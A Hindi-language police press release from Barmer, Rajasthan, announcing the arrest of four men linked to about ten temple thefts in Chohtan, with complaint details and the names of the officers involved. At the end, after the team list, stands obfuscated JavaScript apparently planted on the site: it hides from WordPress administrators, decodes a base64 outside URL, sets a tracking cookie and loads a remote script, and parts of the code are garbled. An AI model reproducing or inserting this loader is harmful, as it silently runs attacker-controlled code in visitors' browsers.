मंदिरो में चोरी की वारदातो को अंजाम देने वाली गैंग का पर्दाफाश,चार शातिर नकबजन गिरफतार, घटना मे प्रयुक्त 2 मोटरसाईकिल बरामदमंदिर चोरी की अन्य वारदातो का भी खुलासाजिला पुलिस अधीक्षक श्री नरेन्द्र सिंह मीना IPS ने जानकारी देते हुए बताया कि सम्पति संबंधी अपराधों के खुलाशा तथा वांछित अपराधियो की दस्तयाबी हेतु श्री विकास कुमार IPS महानिरीक्षक पुलिस जोधपुर रेंज जोधपुर द्वारा चलाये जा रहे विशेष अभियान ऑप्स खुलासा के तहत दिये गये निर्देशानुसार श्री जसाराम बोस अतिरिक्त पुलिस अधीक्षक बाड़मेर व श्री जीवनलाल वृताधिकारी वृत चौहटन के सुपरविजन में श्री सोमकरण नि.पु. के नेतृत्व मे गठित टीम द्वारा मंदिरो मे चोरी की घटनाओ का पर्दाफाश करते हुए नकबजन रमेश कुमार, मुकेश, रासाराम व वासुराम को दस्तयाब कर शांतिनाथ जिनालय से चोरी हुए नकदी रूपये व घटना मे प्रयुक्त दो मोटरसाईकिल बरामद करने मे सफलता हासिल की। उक्त गैंग से मंदिर चोरी की करीब 10 वारदातो का खुलाशा करने मे सफलता प्राप्त की है।
घटना का विवरणः- प्रार्थी श्री गौतमचन्द पुत्र श्री बंशीधर जाति जैन उम्र 52 निवासी सुन्दर नगर चौहटन ने थाना पर रिपोर्ट पेश की कि दिनांक 29.12.2024 की रात को शांतिनाथ जैन मंदिर मे अज्ञात चोर किसी अज्ञात रास्ता से मन्दिर मे घूसे और मन्दिर मे 04 भेंट पात्रों के ताले तोडकर उसमे रखे करीब तीन लाख रुपये चुराकर ले गये है। वगैरा पर प्रकरण संख्या 02/2025 दर्ज कर अन्वेषण शुरू किया गया। प्रार्थी श्री बाबुलाल पुत्र श्री माणकमल जाति जाति जैन पैशा मजदुरी निवासी चौहटन ने थाना पर रिपोर्ट पेश की कि दिंनाक 31.12.2024 को रात के करीबन 01.00 बजे कोई अज्ञात चोरी की गैंग जगदम्बा मन्दिर चौहटन वाली मन्दिर में रखी तिजोरी का हैडल तौड दिया और मन्दिर का जहां मुर्ती विराजमान है का दरवाजा तोड दिया और मन्दिर में रखी मुतिर्या को बिखेर दिया तथा जाते वक्त तीजोरी को उठाकर ले गये और मोहन लाल माहेश्वरी के घर के पास तिजोरी रख कर भाग गये। वगैरा पर प्रकरण संख्या 10/2025 पंजीबद्ध कर अनुसंधान शुरु किया गया।

पुलिस टीम थाना चौहटनः- श्री सोमकरण नि.पु. थानाधिकारी पुलिस थाना चौहटन श्री सुभानअली सउनि पुलिस थाना चौहटन श्री तगाराम कानि 1109 पुलिस थाना चौहटन श्री हरलाल पुनिया कानि 1714 पुलिस थाना चौहटन श्री मूलाराम कानि 1721 पुलिस थाना चौहटन (विशेष भुमिका) श्री किशनाराम कानि 1286 पुलिस थाना चौहटन
पुलिस टीम थाना धनाउ श्री शम्भुराम हैडकानि 81 श्री जैसाराम कानि 164
डीसीआरबी बाड़मेर श्री महिपाल सिह स.उ.नि. श्री भुपेन्द्रसिह कानि 522 श्री लुम्भाराम कानि 1790
पुलिस थाना बोरानाडा जोधपुर आयुक्तालय श्री चूनाराम हैडकानि 100 श्री विशनाराम कानि 654
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();
